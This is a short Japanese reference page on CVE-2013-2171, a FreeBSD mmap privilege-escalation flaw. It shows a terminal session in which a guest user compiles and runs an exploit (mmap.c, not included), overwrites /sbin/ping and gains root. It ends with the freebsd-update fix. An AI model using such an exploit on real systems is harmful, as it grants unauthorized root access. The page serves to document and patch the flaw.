CVE-2013-2171 FreeBSD mmapによる権限昇格の脆弱性
提供: セキュリティ
スポンサーリンク
CVE-2013-2171 は、 FreeBSD の mmap を利用した権限昇格の脆弱性です。
読み方
- 脆弱性
- ぜいじゃくせい
概要
CVE-2013-2171 は、 FreeBSD の mmap を利用した権限昇格の脆弱性です。
FreeBSD 9.0+ 以上に影響があります。 FreeBSD 9.0R, FreeBSD 9.1R で試しました。
使い方
権限昇格の例は、以下の通りです。
vm% uname -a FreeBSD vm2.local 9.1-RELEASE-p3 FreeBSD 9.1-RELEASE-p3 #0: Mon Apr 29 18:11:52 UTC 2013 root@amd64-builder.daemonology.net:/usr/obj/usr/src/sys/GENERIC i386 vm% id uid=1008(guest) gid=1001(users) groups=1001(users) vm% gcc mmap.c vm% ./a.out [+] Saved old '/sbin/ping' [+] Using mmap-ed area at 0x281a4000 [+] Attached to 58383 [+] Copied 4917 bytes of payload to '/sbin/ping' [+] Triggering payload # id uid=0(root) gid=0(wheel) egid=1001(users) groups=1001(users)
対処方法
freebsd-update で更新します。
% sudo freebsd-update fetch % sudo freebsd-update install
関連項目
ツイート
スポンサーリンク